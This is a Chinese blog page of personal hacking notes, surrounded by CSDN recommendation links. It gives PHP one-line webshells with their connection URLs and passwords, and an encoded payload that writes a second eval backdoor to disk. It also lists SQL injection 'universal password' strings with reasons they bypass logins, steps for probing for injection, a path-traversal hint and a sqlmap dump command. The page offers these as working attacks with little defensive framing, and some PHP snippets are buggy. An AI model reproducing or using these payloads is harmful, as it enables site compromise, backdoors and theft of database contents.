笔记

最新推荐文章于 2024-06-09 15:59:40 发布
最新推荐文章于 2024-06-09 15:59:40 发布
阅读量349 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32393893/article/details/105506469
版权

一句话木马代码分析

<?php $_GET['POST']($_POST['GET'])?>;

故意使用了post和get用来迷惑人

https://127.0.0.1/shy.php?POST=assert  密码:GET

 

1.php <?php $_GET['a']($_POST['b'])?>;

$_Get()he $_POST函数是用来传参数的值的

<a  herf="2.php?id='10'&name='xiaoqiang'">传值</a>  在1.php中单击超链接传值
<?php

echo "$_Get['id']";

echo "$_Post['name']";

?>

<html>

<head>

</head>

<body>

<form action="" method="post">

<input type="text" name="test" /> //接收表单的name为 "mima"的数据

<?php>

echo "$_Post['test']";  //获取文本框中的值,并且在当前页中显示

?>

</body>

</html>

 

127.0.0.1/1.php?a=eval   菜刀链接  密码为b

使用eval会报错生产木马失败,使用assert也会报错但会生成木马

代码:

$_GET[a]($_GET[b]);

仅用GET函数就构成了木马;

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29

fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))

fputs(fopen(base64_decode(c.php),w),base64_decode(<?php @eval($_POST[c]); ?>1))

任意文件下载

./ 当前文件夹 ../上一层  ../../../ 上三层(如果没有三层 就回到根目录)

登录框sql注入-万能密码

admin' or 1=1#

admin' or '1'='1

‘or’='or'

SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'

逻辑运算的优先顺序是NOT>OR>AND

 Username='1' 假  1=1 真 '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG' 假

假 or 真 or 假  为真

 $query  = "SELECT first_name, last_name FROM users WHERE user_id = 'admin'or '1'='1';";
 $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' )

 

输入的参数xx为整型时,通常test.asp中SQL语句原貌大致如下:

select * from 表名 where 字段=xx

所以可以用以下步骤测试SQL注入是否存在。

①HTTP://www.xxx.xxx/text.asp?p=xx’(附加一个单引号)此时abc.ASP中的SQL语句变成了

select * from 表名 where 字段=YY’

数据库无法处理,返回异常;

②HTTP://www.xxx.xxx/test.asp?p=xx and 1=1。1=1为真 test.asp运行正常,而且与没加语句之前的test.asp?p=xx运行结果一样正常显示;

③HTTP://www.xxx.xxx/test.asp?p=YY and 1=2,语句为假,因为1≠2  test.asp运行异常;如果以上三步全面满足,test.asp中一定存在SQL注入漏洞。
 

select id from users where username = '' or 1=1--  and password = '456'

=优先于and优先于or username = '' 假  1=1 真  假or真 为真

$sql="select username,password from 表明 where username='$username' and password='$password' limit 0,1"

账号密码同时尝试输入:admin' or '1'='1#

00x1 SQL万能密码的构造

 

在登录框当中可以添加了一个单引号。报错信息如下所示:

据此报错,我们大概的可以猜测其网站的正常是SQL语句如下:

$sql="select username,password from 表明 where username='$username' and password='$password' limit 0,1"

即使如此,那么来尝试将其闭合。

账号密码同时尝试输入:admin' or '1'='1#

 

可见成功登陆。那么我们来分析一下原因吧。

当我们账号输入admin' or '1'='1的时候(密码随意填写),到SQL语句里的执行就是

$sql="select username,password from 表明 where username='test' or '1'='1'

最后的那个单引号是系统自动加上去的。所以我们不必画蛇添足。

至于密码部分全部被#消除了。完整的sql语句是:

$sql="select username,password from 表明 where username='admin' or '1'='1# and password='$password' limit 0,1"

如此一来,系统会自动加一个单引号。就变成了如下语句:

$sql="select username,password from 表明 where username='admin' or '1'='1'"

如此一来就成功绕过了登陆进入网站的后台。

 

sql注入

sqlmap.py -u http://127.0.0.1/1.php?id=1 --level=3

 --dbs  --tables --columns 

-C id,name,passwd  --dump

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

shy014
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见代码执行函数
L_lemo004的博客
07-12 6150
常见代码执行函数,如 eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() 文件操作函数 动态函数(a(a(a(b)) 1、eval() eval() 函数把字...
PHP万能登陆密码
03-21
PHP万能登陆密码,涵盖了所有的万能类型,值得收藏
webshell基本原理和使用(一句话木马实践)
最新发布
m0_65853019的博客
06-09 1268
webshell的基本原理和使用
php后台数据传输,PHP中使用 $_GET 与$_POST 实现简单的前后台数据传输交互功能
weixin_36299472的博客
03-21 643
在之前的学习过程中我们接触过前后台数据请求交互的方法有表单提交、AJAX请求以及Angularjs中的$http,今天我们尝试在PHP中使用 $_GET 与$_POST 实现简单的前后台数据传输交互功能;PHP中给我们提供了一群功能十分强大的超全局 数组,它们 可以在任何位置,任何作用域之内使用,而且无需声明,拿到即可使用!又称 : 超全局数组、超全局变量、预定义数组、预定义变量这篇文章里我们单独...
php之万能密码登陆
奕家
06-24 5268
''' 问题?后台登陆必须的账户和密码正确吗? 答:不一定是,看程序员写的代码如何,有没有做安全防范,程序都是人写的,人不是万能的,所以bug总会有的#嘛! 此时,万能登陆来了 ''' 1.用户正确密码正确: http://192.168.65.133/sqlserver/login.aspx 密码正确的数据库语句 select * from Admin where name='yuan' and passWord='123' 登录成功! 2.用户正确密码...
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)
weixin_43263566的博客
01-25 1万+
Webshell(网页后门)
java超强笔记
12-03
"Java超强笔记"正是一份专为新手准备的学习资源,它全面涵盖了从Java环境的搭建到软件设计的各种概念,旨在提供一个易读且系统的学习路径。 首先,笔记可能会从Java的起源和发展开始介绍,让你了解这门语言的历史...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
javaweb项目实(含笔记与详细实现步骤)
07-20
JavaWeb项目实(含笔记与详细实现步骤) JavaWeb是一种基于Java技术的Web应用程序开发框架,它涵盖了服务器端编程、数据库交互、用户界面设计等多个方面。对于初学者来说,掌握JavaWeb开发是步入Web开发领域的关键...
狂神说笔记大全.rar
11-25
狂神的笔记
万能用户名(密码)原理分析
Have_a_great_day的博客
08-23 607
后端源代码在【.\phpStudy\WWW\cms\admin\login.action.php】中。通过两个例子可知,万能式子是利用后端代码与数据库交互的漏洞,并结合运算符算法,使最后的结果输出为真。将第一条代码输入到用户名,密码随机输入,后端数据库代码将会如下所示。在登录界面,随机输入用户名和密码,后端数据库代码将会如下所示。.】--- 接收前端登录框密码的位置。】--- 接收前端登录框账号的位置。(数据库)相匹配的账号与密码。运算符优先级:and>or。第二十行 --- 搜索与。
PHP代码审计入门-万能密码入门分析
身高两米不到的博客
10-23 1023
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前辈视频学习记录。常用手段是对于用户输入的字符串进行严格过滤,这里代码仅使用了addslashes()用于过滤,其实该函数也是存在绕过风险的,但我们的目的是学习,馒头得一口一口吃。-- 这时注释(要空格)个人已搭建好环境进行测试,这里仅演示代码,这里使用了phpstorm工具,具体下载及破解自行解决。本章开始,进入代码审计的世界。
Dvwa之sql注入low到impossible级别详解
Cai1010110的博客
10-25 9329
在这里我所使用的的是Windows 10系统,dvwa+phpstudy_pro进行靶场练习,关于dvwa的介绍网上一搜一大把,在这里就不加以介绍了,我还是把实践内容介绍好吧!我从网上搜到各位大神操作步骤进行整理学习。 本文介绍SQL Injection的相关内容,后续内容会在之后的文章继续介绍。 小白学习中...... Low 后端控制代码 后端代码解析 1、isset()函数在...
后台登陆万能密码
热门推荐
请叫我菜鸟
01-14 1万+
asp aspx万能密码   1: "or "a"="a    2: ')or('a'='a    3:or 1=1--    4:'or 1=1--    5:a'or' 1=1--    6: "or 1=1--    7:'or'a'='a    8: "or"="a'='a    9:'or''='    10:'or'='or'    11: 1 or '1'=
php 万能密码,万能用户名和万能密码
weixin_42134554的博客
03-11 985
万能用户名any’ union select * from user – (后面有个注释符)联合查询,是查询的结果大于1,为真万能用户名防御PDO$username=$REQUEST['usernm'];$password=$_REQUEST['passwd'];$pdo=new PDO("mssql:host=127.0.0.1;dbname=users","sa","root");$sql="...
dvwa靶场
ing_end的博客
02-26 6264
dvwa靶场 Brute Force (Low) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 法一:暴力破解 先随便输一个账号密码不能通过 此时我们进行抓包 通过BP利用字典爆破,得出密码 根据长度的不同可得知password为密码 (medium) 源码分析: <?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $us
C#编程基础教程笔记
"这是一份关于C#编程语言的学习笔记,主要针对初学者,内容涵盖了C#的基础知识,包括C#教程的概述、C#语言的特点、开发环境的设置、程序结构、基本语法、数据类型、类型转换、变量、常量、运算符、判断语句、循环...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值